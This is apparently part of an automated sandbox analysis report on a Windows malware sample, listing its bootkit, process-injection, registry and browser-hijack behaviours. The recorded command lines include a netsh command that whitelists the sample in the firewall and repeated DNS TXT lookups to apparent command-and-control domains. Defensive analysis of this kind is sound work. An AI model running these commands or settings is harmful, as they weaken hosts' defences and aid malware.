File opened (read-only)	\??\N:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\O:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\P:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\Q:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2960 set thread context of 228	2960	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	88

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 28 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mofcomp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe

Modifies Internet Explorer settings 1 TTPs 11 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\IIL = "0"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\Download\CheckExeSignatures = "no"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\ltHI = "0"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\ltTST = "1268"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\Download\RunInvalidSignatures = "1"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\BrowserEmulation\MSCompatibilityMode = "0"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Internet Explorer\SearchScopes	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://findgala.com/?&uid=2269&q={searchTerms}"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\PRS = "http://127.0.0.1:27777/?inj=%ORIGINAL%"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Modifies data under HKEY_USERS 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=2269&q={searchTerms}"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=2269&q={searchTerms}"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=2269&q={searchTerms}"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Modifies registry class 15 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.DocHostUIHandler\Clsid	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.DocHostUIHandler\Clsid\ = "{3F2BBC05-40DF-11D2-9455-00104BC936FF}"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Software	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Software\Microsoft\Internet Explorer\SearchScopes	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.DocHostUIHandler	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.DocHostUIHandler\ = "Implements DocHostUIHandler"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID\ = "eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.DocHostUIHandler"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Software\Microsoft	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Software\Microsoft\Internet Explorer	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=2269&q={searchTerms}"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ = "Implements DocHostUIHandler"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeSecurityPrivilege	2272	mofcomp.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2960 wrote to memory of 228	2960	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	88
PID 2960 wrote to memory of 228	2960	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	88
PID 2960 wrote to memory of 228	2960	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	88
PID 2960 wrote to memory of 228	2960	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	88
PID 2960 wrote to memory of 228	2960	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	88
PID 228 wrote to memory of 2272	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	91
PID 228 wrote to memory of 2272	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	91
PID 228 wrote to memory of 2272	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	91
PID 228 wrote to memory of 1888	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	93
PID 228 wrote to memory of 1888	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	93
PID 228 wrote to memory of 1888	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	93
PID 228 wrote to memory of 452	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	95
PID 228 wrote to memory of 452	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	95
PID 228 wrote to memory of 452	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	95
PID 228 wrote to memory of 2288	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	97
PID 228 wrote to memory of 2288	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	97
PID 228 wrote to memory of 2288	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	97
PID 228 wrote to memory of 4568	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	100
PID 228 wrote to memory of 4568	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	100
PID 228 wrote to memory of 4568	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	100
PID 228 wrote to memory of 456	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	102
PID 228 wrote to memory of 456	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	102
PID 228 wrote to memory of 456	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	102
PID 228 wrote to memory of 2704	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	104
PID 228 wrote to memory of 2704	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	104
PID 228 wrote to memory of 2704	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	104
PID 228 wrote to memory of 4412	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	106
PID 228 wrote to memory of 4412	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	106
PID 228 wrote to memory of 4412	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	106
PID 228 wrote to memory of 4232	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	108
PID 228 wrote to memory of 4232	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	108
PID 228 wrote to memory of 4232	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	108
PID 228 wrote to memory of 4864	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	110
PID 228 wrote to memory of 4864	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	110
PID 228 wrote to memory of 4864	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	110
PID 228 wrote to memory of 1916	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	112
PID 228 wrote to memory of 1916	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	112
PID 228 wrote to memory of 1916	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	112
PID 228 wrote to memory of 4292	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	114
PID 228 wrote to memory of 4292	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	114
PID 228 wrote to memory of 4292	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	114
PID 228 wrote to memory of 376	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	116
PID 228 wrote to memory of 376	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	116
PID 228 wrote to memory of 376	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	116
PID 228 wrote to memory of 4692	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	118
PID 228 wrote to memory of 4692	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	118
PID 228 wrote to memory of 4692	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	118
PID 228 wrote to memory of 1672	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	120
PID 228 wrote to memory of 1672	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	120
PID 228 wrote to memory of 1672	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	120
PID 228 wrote to memory of 2336	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	122
PID 228 wrote to memory of 2336	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	122
PID 228 wrote to memory of 2336	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	122
PID 228 wrote to memory of 3648	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	124
PID 228 wrote to memory of 3648	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	124
PID 228 wrote to memory of 3648	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	124
PID 228 wrote to memory of 3268	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	126
PID 228 wrote to memory of 3268	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	126
PID 228 wrote to memory of 3268	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	126
PID 228 wrote to memory of 3248	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	128
PID 228 wrote to memory of 3248	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	128
PID 228 wrote to memory of 3248	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	128
PID 228 wrote to memory of 3784	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	130
PID 228 wrote to memory of 3784	228	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	130

C:\Users\Admin\AppData\Local\Temp\eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe"
1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2960
- C:\Users\Admin\AppData\Local\Temp\eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
  "C:\Users\Admin\AppData\Local\Temp\eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe" "C:\Users\Admin\AppData\Local\Temp\eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe"
  2⤵
  - Enumerates VirtualBox registry keys
  - Blocks application from running via registry modification
  - Drops file in Drivers directory
  - Event Triggered Execution: Image File Execution Options Injection
  - Checks computer location settings
  - Adds Run key to start application
  - Checks for any installed AV software in registry
  - Enumerates connected drives
  - Writes to the Master Boot Record (MBR)
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:228
- - C:\Windows\SysWOW64\wbem\mofcomp.exe
    "C:\Windows\System32\wbem\mofcomp.exe" "C:\Users\Admin\AppData\Local\Temp\8587.mof"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2272
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\System32\netsh.exe" "firewall" add allowedprogram "C:\Users\Admin\AppData\Local\Temp\eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe" "Internet Security Essentials" ENABLE
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:1888
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt fimqqxd901eirwa.com 8.8.8.8
    3⤵
    - System Location Discovery: System Language Discovery
    PID:452
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt fimqqxd901eirwa.net 8.8.8.8
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2288
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt fimqqxd901eirwa.com 208.67.222.222
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4568
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt fimqqxd901eirwa.net 208.67.222.222
    3⤵
    - System Location Discovery: System Language Discovery
    PID:456
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt fimqqxd901eirwa.com 8.8.4.4
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2704
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt fimqqxd901eirwa.net 8.8.4.4
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4412
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt fimqqxd901eirwa.com 208.67.220.220
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4232
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt fimqqxd901eirwa.net 208.67.220.220
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4864
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt hpvzahpqz1326bei.com 8.8.8.8
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1916
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt hpvzahpqz1326bei.net 8.8.8.8
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4292
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt hpvzahpqz1326bei.com 208.67.222.222
    3⤵
    - System Location Discovery: System Language Discovery
    PID:376
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt hpvzahpqz1326bei.net 208.67.222.222
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4692
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt hpvzahpqz1326bei.com 8.8.4.4
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1672
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt hpvzahpqz1326bei.net 8.8.4.4
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2336
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt hpvzahpqz1326bei.com 208.67.220.220
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3648
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt hpvzahpqz1326bei.net 208.67.220.220
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3268
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt ff85kszciilnsae.com 8.8.8.8
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3248
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt ff85kszciilnsae.net 8.8.8.8
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3784
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt ff85kszciilnsae.com 208.67.222.222
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1168
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt ff85kszciilnsae.net 208.67.222.222
    3⤵
